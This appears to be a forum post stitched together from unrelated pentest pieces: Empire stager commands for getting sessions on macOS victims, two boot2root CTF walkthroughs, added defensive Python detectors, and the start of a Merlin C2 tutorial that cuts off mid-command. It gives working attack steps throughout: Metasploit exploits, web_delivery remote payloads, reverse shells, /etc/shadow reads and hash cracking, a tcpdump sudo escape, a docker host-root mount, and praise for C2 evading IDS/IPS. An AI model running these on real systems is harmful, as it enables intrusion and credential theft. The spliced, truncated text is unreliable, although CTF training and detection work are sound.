05-14-2020, 11:55 AM
Table of Contents:
- osx/macho
- osx/applescript
- osx/launcher
- osx/jar
- osx/safari_launcher
The first stager we will use is osx/macho. This stager creates a Mach-O file, which is the executable binary format of OS X; the format is made specifically for OS X and tells the system in which order code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.
The listener creation is the same as for Windows: use the http listener. Once the listener is created, execute the following commands:
```
usestager osx/macho
set Listener http
set OutFile shell.macho
execute
```
Once shell.macho is executed on the victim's PC, you will have your session as shown in the image below:
![[Image: 1.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-kEc1p_xfEc0/XI_MTj-pLAI/AAAAAAAAdlo/qll6lDP7Mx08J63nfaUmL0B_2xaeGIcuACLcBGAs/s1600/1.png?w=687)
osx/applescript
The next stager we will use is osx/applescript. This stager creates AppleScript code; AppleScript is the dedicated scripting language for Mac and gives automated control over scriptable Mac applications. Therefore, it is an important stager for pen-testing Mac. To create the malicious AppleScript, run the following commands:
```
usestager osx/applescript
set Listener http
execute
```
![[Image: 2.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-mhnHqL5YRF4/XI_MTFFXk8I/AAAAAAAAdlg/6jcXXPifvUAldN40o801-SlCK99euKB6gCLcBGAs/s1600/2.png?w=687)
Executing the above stager produces code; run this code on the target system as shown in the following image:
![[Image: 3.1.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-WarcRcWiK4k/XI_MTaEw6QI/AAAAAAAAdlk/PMnI5LkHxYQFOs5wWjx_2Eiy8OzHeWm6ACLcBGAs/s1600/3.1.png?w=687)
As soon as the code is executed on the victim's PC, you will have your session as shown in the image:
![[Image: 3.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-rj1pNDlVOXo/XI_MT9WlHUI/AAAAAAAAdls/6oZDrbckWzcOkVklYLz5EVcUVoSPlR2ngCLcBGAs/s1600/3.png?w=687)
osx/launcher
The next stager we will use is osx/launcher, which is the most commonly used one. To run this stager, execute the following commands:
```
usestager osx/launcher
execute
```
Copy the generated code and run it in the target system's shell. As soon as the code is executed, you will have your session as shown in the image below:
![[Image: 4.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-QO5hDLH5TMA/XI_MUUyq8rI/AAAAAAAAdlw/fS7YnGl_QF0tB09ju6qBfSyPdNwORibmgCLcBGAs/s1600/4.png?w=687)
osx/jar
The next stager we will use is osx/jar. This stager creates a jar file, which is a Java archive: a compressed bundle of Java files that runs as desired when extracted. This file extension is specific to Java. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following commands to run the stager:
```
usestager osx/jar
set Listener http
set OutFile out.jar
execute
```
The stager creates a jar file as described above; once the file is executed on the victim's system, you will have your session as shown in the image:
![[Image: 5.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-558_GC4AXyo/XI_MU1Y64XI/AAAAAAAAdl0/ZHB71vlXLysb2AhMWp_MQ0UCpTQxWz6PQCLcBGAs/s1600/5.png?w=687)
osx/safari_launcher
The last stager we will use is osx/safari_launcher, which generates an HTML script for Safari. For this stager, run the following commands:
```
usestager osx/safari_launcher
set Listener http
execute
```
Run the generated code in Safari on the victim's PC and you will have your session as shown in the image below:
![[Image: 6.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-O2F5cUM6G68/XI_MVHa4ZkI/AAAAAAAAdl4/RNBiNHt72fEzLx_d0ELBIMHn6xDQI8Y-ACLcBGAs/s1600/6.png?w=687)
So, these were five ways to attack or pentest OS X. They are pretty easy and convenient, and each of them is valid and up to date.
Hello friends! Today we are going to take another boot2root challenge known as “Web Developer: 1”. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM from the link in the original post.
Security Level: Intermediate
Penetrating Methodology:
- IP Discovery using netdiscover
- Network scanning (Nmap)
- Surfing HTTP service port
- Enumerating directories using Dirb
- Finding “cap” file
- Analyzing the “cap” file and finding WordPress password
- Installing the vulnerable plugin in WordPress
- Exploiting the vulnerable plugin to get a reverse shell
- Finding SSH login and password
- Finding an application in the sudoers list
- Getting flag
Let’s start off with scanning the network to find our target.
```bash
netdiscover
```
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-oPQgoisn9Xc/XIqG98NacaI/AAAAAAAAdhc/gSL_W_NX-SQZPRZmBuAybhRGTamCqTOewCLcBGAs/s1600/1.png?w=687&ssl=1)
We found our target –> 192.168.19.131
Our next step is to scan our target with nmap.
```bash
nmap -p- -sV 192.168.19.131
```
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8EwEhk6kw3k/XIqG_Te5YLI/AAAAAAAAdh0/bMIDmHf_9T4h6tAVatLVRboXBDVoOLWVACLcBGAs/s1600/2.png?w=687&ssl=1)
From the Nmap version scan we enumerated the following details: port 22 is running SSH and port 80 is running HTTP.
As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6dI0bCLdUeU/XIqHA61nywI/AAAAAAAAdh4/E7Wpt8_1a60msGNpGCHGQHNNqIu_FSgLwCLcBGAs/s1600/3.png?w=687&ssl=1)
As we couldn't find any links on this page, we bruteforce directories with a dirb scan. From the scan result, we choose the highlighted directory for further enumeration.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-vkIwFZbffcM/XIqHBGoe28I/AAAAAAAAdiA/WdGeqVkWF00_IdRp2hAUHK9A89ab6OInwCLcBGAs/s1600/4.png?w=687&ssl=1)
So, we opened this directory in the browser and found a cap file.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-vUoYZlqNKgE/XIqHBGxUCwI/AAAAAAAAdh8/ZJiY5_V6-8oAxSx5zOws5Gf_eEPuxULLACLcBGAs/s1600/5.png?w=687&ssl=1)
We open the cap file in Wireshark, and as you can see we find the username and password in it.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-l_Mdj1AtanQ/XIqHBlsmzWI/AAAAAAAAdiE/1nG_kDOB26ACASbOuaLqFMSQxJmzrKzsgCLcBGAs/s1600/7.png?w=687&ssl=1)
Using the above username and password, we can log in to the website directly. As you can see, the website runs WordPress, and I remember that a WordPress plugin, ReFlex Gallery, is vulnerable. So, under plugins I added this plugin, as you can see in the image below:
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-yHat_YhVDWM/XIqHCGIr1dI/AAAAAAAAdiM/irpsVjjir_cBNxNhTm57XcBnRVcegdswQCLcBGAs/s1600/8.png?w=687&ssl=1)
Now, we use the built-in Metasploit exploit for this plugin to get a session. For this, we use the following commands:
```
use exploit/unix/webapp/wp_reflexgallery_file_upload
set rhosts 192.168.19.131
exploit
```
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-rmNSY5z1j3g/XIqHCEPizTI/AAAAAAAAdiI/JuKmNmMApP8Lyo9l3Iv8kci6fJ_i_U57ACLcBGAs/s1600/9.png?w=687&ssl=1)
Once we got the session, I navigated around and found wp-config.php; reading the config file, we find a username and password.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-l7rrVwMWHj0/XIqG-EUo8qI/AAAAAAAAdhk/tFMTbe02KTozk6Dc-D1-9INpZM5tgQsmgCLcBGAs/s1600/11.png?w=687&ssl=1)
Now that we have found credentials inside the file, we use them to log in through SSH. After logging in we check the sudoers list and find that we can run “tcpdump” as the root user.
```bash
ssh <username>@192.168.19.131
sudo -l
```
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-uFpY_2GkyYk/XIqG-MoQ6eI/AAAAAAAAdhg/ThQDcGTmqMQbcW6p_ajh05fjjhFroGFXgCLcBGAs/s1600/12.png?w=687&ssl=1)
Since tcpdump can execute a file through its -z option, we use the following commands to run the “ls -al /root” command. The command is executed only once tcpdump captures a packet.
```bash
COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > "$TF"
chmod +x "$TF"
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z "$TF"
```
![[Image: 13.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-myMZedHHzFg/XIqG-xFIkkI/AAAAAAAAdho/fknpURPe02AvxQKxE-Vnw_FOPZKnW0T9ACLcBGAs/s1600/13.1.png?w=687&ssl=1)
After starting tcpdump, we connect to the target machine through SSH in a new terminal and send a TCP packet to 127.0.0.1 using netcat. We have to do this locally because we started tcpdump on the loopback interface.
```bash
nc -v -z -n -w 1 127.0.0.1 1
```
As soon as we send the packet, our command is executed and we can see all the files inside the “/root” directory, where we find a file called “flag.txt”. We use the tcpdump command again to read “flag.txt” and get the final flag.
```bash
COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > "$TF"
chmod +x "$TF"
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z "$TF"
```
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-GjFwbMEtzis/XIqG_QeoVgI/AAAAAAAAdhw/fvJSthw6EvkUNLFIa_wYfU7Cmhft_4pQwCLcBGAs/s1600/14.png?w=687&ssl=1)
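The sudo rule abused above leaves a trace: sudo logs the full command line, and any tcpdump invocation carrying -z hands a post-rotate command to tcpdump, which runs it as the sudo target user. The following is an added defender-side example, not code from the page; it scans constructed sudo log lines (not the VM's real logs) and flags such invocations:

```python
import os
import re
import shlex

# Constructed auth.log excerpt (not from the page) in the format sudo writes.
# The first line mirrors the page's trick: -z passes a post-rotate command
# that tcpdump executes as the sudo target user (root) after each rotation.
SAMPLE_AUTH_LOG = """\
Mar 10 10:01:02 webdev sudo: webdeveloper : TTY=pts/0 ; PWD=/home/webdeveloper ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/tmp.Ab12Cd
Mar 10 10:03:15 webdev sudo: webdeveloper : TTY=pts/0 ; PWD=/home/webdeveloper ; USER=root ; COMMAND=/usr/sbin/tcpdump -i eth0 -w /var/log/capture.pcap
Mar 10 10:04:20 webdev sudo: backup : TTY=pts/1 ; PWD=/home/backup ; USER=root ; COMMAND=/usr/sbin/tcpdump -i eth0 -G 3600 -zgzip -w /var/log/cap-%s
Mar 10 10:05:00 webdev sudo: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/ls -al /root
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)

# Post-rotate helpers normally seen with -z; anything else deserves a look.
KNOWN_ROTATE_HELPERS = {"gzip", "bzip2", "xz", "zstd"}


def postrotate_command(argv):
    """Return the argument given to tcpdump's -z option, or None.

    getopt accepts both the separated form '-z cmd' and the glued form
    '-zcmd'. '-Z' (drop privileges to a user) is a different option and is
    not matched because the comparison is case-sensitive.
    """
    for i, arg in enumerate(argv):
        if arg == "-z" and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("-z") and len(arg) > 2:
            return arg[2:]
    return None


def tcpdump_postrotate_findings(log_text):
    """Scan sudo log lines and report every tcpdump run that carries -z.

    Each finding records who ran it, which user it ran as, the post-rotate
    command, and whether that command is something other than a standard
    compression helper (for example a freshly created script in /tmp).
    A sudoers rule that grants tcpdump without fixed arguments is therefore
    a root grant; restrict the arguments or use a wrapper instead.
    """
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = shlex.split(m.group("cmd"))
        if not argv or os.path.basename(argv[0]) != "tcpdump":
            continue
        cmd = postrotate_command(argv)
        if cmd is None:
            continue
        findings.append({
            "user": m.group("user"),
            "runs_as": m.group("target"),
            "postrotate": cmd,
            "suspicious": os.path.basename(cmd) not in KNOWN_ROTATE_HELPERS
                          or "/" in cmd,
        })
    return findings


if __name__ == "__main__":
    for finding in tcpdump_postrotate_findings(SAMPLE_AUTH_LOG):
        print(finding)
```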
Hello friends! Today we are going to take another boot2root challenge known as “HackInOS: 1”. The credit for making this VM machine goes to “Fatih Çelik” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM from the link in the original post.
Security Level: Intermediate
Penetrating Methodology:
- IP Discovery using netdiscover
- Network scanning (Nmap)
- Surfing HTTP service port
- Finding upload directory
- Finding source code for a web application
- Getting reverse shell
- Pivoting using Metasploit
- Logging in through MySQL and finding SSH credentials
- Logging in through SSH
- Getting the root shell and finding the flag
Let’s start off with scanning the network to find our target.
```bash
netdiscover
```
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-9Qhb3mvFbLA/XIo09slUvGI/AAAAAAAAdfk/E9YWRBklH1QNDScrmBnkWUu1PSxdzDViACLcBGAs/s1600/1.png?w=687&ssl=1)
We found our target –> 192.168.1.101
Our next step is to scan our target with nmap.
```bash
nmap -p- -sV 192.168.1.101
```
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-bL1xlCyBCBE/XIo1CMQSYNI/AAAAAAAAdgM/s9aRP_ELpfs2-A1BElnihI-U1YNcxo38gCLcBGAs/s1600/2.png?w=687&ssl=1)
The Nmap output shows that 2 ports are open: 22 (SSH) and 8000 (HTTP).
We find that port 8000 is running HTTP, so we open the IP in our browser and find there is WordPress CMS running on the web server.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Cit6ezm6kzI/XIo1DXcFQUI/AAAAAAAAdgk/3hIhY6B01FU6ZPYBoh75i00AfdVfu3gSgCLcBGAs/s1600/3.png?w=687&ssl=1)
We don’t find any vulnerable plugin or theme on the CMS, so we run a dirb scan to enumerate the directories on the target machine.
```bash
dirb <target URL>
```
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-6QpgL4CgH1Y/XIo1D66GAeI/AAAAAAAAdgo/ETnObcHmKokvNvOHM5Y8-2Hp-Q7xstzNwCLcBGAs/s1600/4.png?w=687&ssl=1)
Dirb scan gave us “robots.txt”, we open it and find a link to “upload.php” and “/uploads”.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-4X1cJtQ74lE/XIo1EKvCDVI/AAAAAAAAdgs/UIhgri0gILEp6rVAeiWkT3hlMIT6EhVMQCLcBGAs/s1600/5.png?w=687&ssl=1)
We open upload.php and find a page where we can upload images. We try to upload an image and get a smiling face, which seems to mean there was an error uploading the file.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-r5H9vhXO6ww/XIo1EeEi5xI/AAAAAAAAdgw/_1r7iU_NtrIh75s6_v4dUg2uYkxxWQlvQCLcBGAs/s1600/6.png?w=687&ssl=1)
We open the source code of the web page and inside a comment we find a GitHub link.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ALt067kIAC0/XIo1Ek40LEI/AAAAAAAAdg0/knftd4_OxfE9b1rc42aCLZYEBgpqSy2RACLcBGAs/s1600/7.png?w=687&ssl=1)
We open the GitHub link and find there is a source code for the upload.php file.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-RO051Q2ek_I/XIo1E5b6BYI/AAAAAAAAdg4/hooqHvFdoAcqa578QJxil7Ev9dxCvEhBgCLcBGAs/s1600/8.png?w=687&ssl=1)
Now to upload the image we just need to add “GIF98” to the start of the php reverse shellcode we want to upload.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-b76p9kXfuSc/XIo1FNVC-tI/AAAAAAAAdg8/_G20LamC_n8C9XQNbkrF9wanoiO86q-0ACLcBGAs/s1600/9.png?w=687&ssl=1)
Now when we upload our php reverse shell, we are successfully able to upload the shell. But we do not know the filename after it is uploaded on the server.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-0AQlwy1X0fw/XIo09ubE5UI/AAAAAAAAdfc/auUEWdfvW7Mf74FvKAVZ3fQRA7S-qYBXQCLcBGAs/s1600/10.png?w=687&ssl=1)
Taking a look at the source code of “upload.php”, we find that after the shell is uploaded the file gets renamed to “md5(<filename><random number between 1 and 100>).<file extension>”. So, we create a Python script that writes a text file containing all 100 possible md5 filenames. You can download the script from the link in the original post.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-KbuRdNRc3mE/XIo09oVC8II/AAAAAAAAdfg/EBv8RSJG0E0hYI9c3KyqYIwUafS1pcYlACLcBGAs/s1600/11.png?w=687&ssl=1)
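The two weaknesses in this upload.php, a signature-only image check and a rename to md5(<filename><1..100>).<ext>, can be shown side by side. This added example (not the VM's code) reimplements the weak check and rename in Python, shows that the rename yields only 100 candidate names, and contrasts a hardened acceptor; it uses the real GIF signatures GIF87a/GIF89a, and the sample upload bodies are constructed:

```python
import hashlib
import secrets

# Real GIF signatures. A check that only looks at these leading bytes is
# what the prefix trick above bypasses.
GIF_MAGIC = (b"GIF87a", b"GIF89a")
SIGNATURES = {
    "gif": GIF_MAGIC,
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Constructed upload bodies: a GIF header glued onto PHP source, and a
# minimal genuine GIF header.
POLYGLOT = b"GIF89a<?php echo 'constructed sample'; ?>"
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16


def weak_is_image(data):
    """Magic-bytes-only check: any file that starts with a GIF header passes."""
    return data.startswith(GIF_MAGIC)


def weak_stored_name(filename, rnd):
    """Rename scheme the page describes: md5(<filename><random 1..100>).<ext>."""
    ext = filename.rsplit(".", 1)[-1]
    digest = hashlib.md5((filename + str(rnd)).encode()).hexdigest()
    return digest + "." + ext


def candidate_names(filename):
    """Every name the weak scheme can produce for one upload: just 100.

    The rename keeps the client's extension, so a .php upload is still a
    .php file in the web root, and its name is one of 100 values.
    """
    return [weak_stored_name(filename, n) for n in range(1, 101)]


def hardened_accept(filename, data):
    """Allow-list the extension, require the content to match it, and store
    the file under an unguessable, server-chosen name and extension.

    Returns (accepted, stored_name_or_reason). A GIF-prefixed PHP file with
    a .gif name is still accepted, but it is stored as <random>.gif, which
    the web server serves as an image rather than executing; serving
    uploads from a non-executable location completes the control.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in SIGNATURES:
        return False, "extension not allowed"
    if not data.startswith(SIGNATURES[ext]):
        return False, "content does not match extension"
    # 128 random bits from the OS CSPRNG: nothing for a client to enumerate.
    stored = secrets.token_hex(16) + "." + ("jpg" if ext == "jpeg" else ext)
    return True, stored


if __name__ == "__main__":
    print("weak check passes polyglot:", weak_is_image(POLYGLOT))
    print("candidate names for shell.php:", len(candidate_names("shell.php")))
    print("hardened, shell.php:", hardened_accept("shell.php", POLYGLOT))
    print("hardened, pic.gif:", hardened_accept("pic.gif", REAL_GIF))
```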
Now we run the python script and use dirb to bruteforce the new file name.
```bash
dirb <target URL> dict.txt
```
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-OErVzrrULLE/XIo0-X75ShI/AAAAAAAAdfo/pdLT8tm0708D6Pr46K3dTJVwqFEmzwyEQCLcBGAs/s1600/12.png?w=687&ssl=1)
We set up the listener, run the dirb command again and get a reverse shell.
```bash
nc -lvp 1234
dirb <target URL> dict.txt
```
After getting a reverse shell, we spawn a TTY shell and find that we are inside a Docker container. We search for files with the SUID bit set and find that the “tail” command has it. So, we use “tail” to read “/etc/shadow”.
```bash
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
tail -c1G /etc/shadow
```
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-atGeNiSu4QA/XIo0-vfSZbI/AAAAAAAAdfs/0Cib6YMUeZoUgGQ_QOairhQa19KRE4NmACLcBGAs/s1600/13.png?w=687&ssl=1)
We get the password hash for the “root” user from the /etc/shadow file and save it on our system. We crack the hash using John the Ripper and find the password to be “john”.
```bash
john hash
```
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-bm82wggsmhY/XIo0_MDyFRI/AAAAAAAAdf0/35PgG6ZIppQqnK5_xsXJBWc7YwrvEmcBgCLcBGAs/s1600/14.png?w=687&ssl=1)
After finding the password, we switch to the root user. After becoming a root user, we switch to “/root” directory and find a file called “flag”. We open the “flag” file and find nothing useful.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-eXUMuhnLZ2E/XIo0_sjKKqI/AAAAAAAAdf4/Dnc7rPuXkzI_wX5G5g06SIstx9AcFXP-wCLcBGAs/s1600/15.png?w=687&ssl=1)
Further enumerating the system, we find the username and password for the database login inside /var/www/html/wp-config.php. There is no MySQL service running on this machine, and we are also not able to log in through SSH using these credentials.
![[Image: 14.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-SrqM8X7Vojo/XIo0-jXjdqI/AAAAAAAAdfw/9ZnqyZao5J8CcOmq3Evi62UMcNI6T8NgwCLcBGAs/s1600/14.1.png?w=687&ssl=1)
Getting back inside /root directory, we find a file called “.port”. We open the file and find a hint to look for other containers.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-_H4HtqxYJJs/XIo1AGTtABI/AAAAAAAAdf8/TdYUTSbbVjInC67PTsE75tqJIEtHqC5RACLcBGAs/s1600/16.png?w=687&ssl=1)
To further interact with the shell, we get a meterpreter reverse shell. We use the web_delivery module in Metasploit-framework to get a reverse shell.
```
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > setg lhost eth0
msf5 exploit(multi/script/web_delivery) > setg lport 8888
msf5 exploit(multi/script/web_delivery) > run
```
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-TCr08JAS1os/XIo1AjUnkeI/AAAAAAAAdgA/KFq9BK4ZZy0YQAHyW7m0OGak1SL89afcQCLcBGAs/s1600/17.png?w=687&ssl=1)
We copy the command provided by web_delivery module and run it on the target machine.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-ojrP5gTGj3o/XIo1BBzGrRI/AAAAAAAAdgE/9RCqEAprGYElDip4JHEO7ORJF5hJHD6KgCLcBGAs/s1600/18.png?w=687&ssl=1)
As soon as we run the command on the target machine, we get a reverse shell. After getting a reverse shell, we use autoroute module in Metasploit-framework for pivoting.
```
msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit
```
Then we use the ping_sweep module to find all the machines on the new network.
```
msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit
```
Then we run a portscan module to find all the ports on all the machines.
```
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit
```
We find the following ports open on the following machines:
- 172.18.0.1: 22, 8000
- 172.18.0.2: 80
- 172.18.0.3: 3306
- 172.18.0.4: 2021
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-naMefZ3rr3I/XIo1BtNyINI/AAAAAAAAdgI/b6AdtGOHPP4aAQpVDhpYpqskOfhrDv-LwCLcBGAs/s1600/19.png?w=687&ssl=1)
As we know, port 3306 is the MySQL service, and we also have the username and password for the WordPress database. So, we can log in to MySQL on target “172.18.0.3” using the credentials “wordpress:wordpress”.
```
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
mysql -u wordpress -p wordpress -h 172.18.0.3
```
After logging in we check all the databases on the MySQL server.
```sql
show databases;
```
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-u_ZLqQtrh9g/XIo1CW3MODI/AAAAAAAAdgQ/cOulOKiKN28u6Dv47xTUrXfRYJwIkNqQACLcBGAs/s1600/20.png?w=687&ssl=1)
We now check all the tables available on the database and find a table called “host_ssh_cred”. We check the columns inside the table and find the username and hash of a password.
```sql
show tables;
select * from host_ssh_cred;
```
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-yRmdNRE4jXE/XIo1CtozhJI/AAAAAAAAdgU/YwWwtuQLKnQ4cPlUB17sIMzgGv3IpcDgQCLcBGAs/s1600/21.png?w=687&ssl=1)
We save the hash on our system and use John the Ripper to crack it:
```bash
john --format=RAW-md5 sshpass
```
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-wxDk-5b-keA/XIo1C2j3pbI/AAAAAAAAdgY/1hSZvvzaiOYRWWt5t6cLa5tc2AtbU9bNgCLcBGAs/s1600/22.png?w=687&ssl=1)
Now we have the SSH credentials: hummingbird:123456. We log in through SSH and, when we run the id command, find that we are a member of the docker group. Docker has a dedicated group that allows unprivileged users to manage containers without escalating their privileges. To exploit this, we first need to check which docker images are available.
```bash
ssh hummingbird@192.168.1.101
id
docker images
```
![[Image: 23.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-OonAXAPSwEc/XIo1DUZNGtI/AAAAAAAAdgg/qenabSk0sAMoTMFyQxVtcfMPwh7LBOScACLcBGAs/s1600/23.png?w=687&ssl=1)
We find that the Ubuntu image is available, so we use it to create a new container and mount the host's / directory at /root inside it. After running the container we go to /root/root and find a file called “flag”. When we open the file, we find our congratulatory flag.
```bash
docker run -v /:/root -i -t ubuntu /bin/bash
cd /root
cd root
cat flag
```
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-wg5bQOtV8IE/XIo1DM-vrHI/AAAAAAAAdgc/UTcQKVh_uzQb09UNVckmpU4q7SGs5jFswCLcBGAs/s1600/24.png?w=687&ssl=1)
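The docker-group membership and the host-root bind mount used above are both auditable from the host. This added example (not from the page) lists docker-group members from a constructed /etc/group excerpt and flags privileged containers or read-write bind mounts of sensitive host paths in constructed docker inspect output:

```python
import json
import posixpath

# Constructed /etc/group excerpt (not from the page).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:admin
docker:x:999:hummingbird,deploy
"""

# Constructed excerpt of `docker inspect` output for three containers
# (not captured from the page's VM); only the fields used here are kept.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/hostroot",
     "HostConfig": {"Binds": ["/:/root"], "Privileged": False}},
    {"Name": "/web",
     "HostConfig": {"Binds": ["/srv/www:/var/www/html:ro"], "Privileged": False}},
    {"Name": "/ci",
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                    "Privileged": True}},
])

# Host paths that hand a container control of the host when mounted
# read-write ("/" itself is handled separately).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/sys", "/dev",
                        "/var/run/docker.sock", "/run/docker.sock")


def docker_group_members(group_text):
    """Users listed in the docker group of an /etc/group file.

    Membership gives access to the Docker socket, which is effectively root
    on the host: the page's one-liner mounts / into a container and reads
    /root/flag. Treat this group like sudo when reviewing accounts.
    """
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def parse_bind(spec):
    """Split a HostConfig.Binds entry 'src:dst[:opts]' into (src, dst, ro).

    Named volumes ('data:/data') have no leading slash and never match the
    sensitive-path check below.
    """
    parts = spec.split(":")
    src, dst = parts[0], parts[1]
    ro = len(parts) > 2 and "ro" in parts[2].split(",")
    return src, dst, ro


def is_sensitive(host_path):
    """True for / or any path at or below one of SENSITIVE_HOST_PATHS."""
    p = posixpath.normpath(host_path)
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE_HOST_PATHS)


def risky_containers(inspect_json):
    """Report containers that are privileged or bind-mount a sensitive host
    path read-write; one entry per reason."""
    out = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?")
        hc = c.get("HostConfig", {})
        if hc.get("Privileged"):
            out.append({"container": name, "reason": "privileged"})
        for spec in hc.get("Binds") or []:
            src, dst, ro = parse_bind(spec)
            if is_sensitive(src) and not ro:
                out.append({"container": name,
                            "reason": f"rw bind of {src} at {dst}"})
    return out


if __name__ == "__main__":
    print("docker group:", docker_group_members(SAMPLE_GROUP))
    for item in risky_containers(SAMPLE_INSPECT):
        print(item)
```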
In this article, we learn how to use the Merlin C2 tool. It is developed by Russel Van Tuyl in the Go language.
Table of contents:
- Introduction
- Installation
- Windows exploitation
- Windows post exploitation
- Linux exploitation
- Linux post exploitation
Merlin is a great cross-platform command and control tool written in the Go language. It is made of two elements, the server and the agent, and it communicates over the HTTP/2 protocol. The best things about Merlin are that it can be compiled for any platform and that you can even build it from source. Normally, agents are placed on Windows and listened for on Linux, but because Merlin is written in Go it lets us put agents on any platform or machine we come across and listen for them on any platform as well. This makes it more successful than others in red teaming, as IDS/IPS struggle to identify it.
The Merlin server is run from the folder where the agents can call out to it. By default, the server is configured on 127.0.0.1:443, but you can change it to your own IP. The Merlin agent can, as discussed earlier, be cross-compiled to run on any platform. Agents are interacted with through the Merlin server. Any binary is executed using the target's PATH variable.
Installation
Merlin's installation is pretty tricky; the most convenient way is shown in this article. Installing the Go language is compulsory in order for Merlin to work, so to install Go type:
```bash
apt install golang
```
And then run the following commands to install Merlin:
```bash
mkdir /opt/merlin; cd /opt/merlin
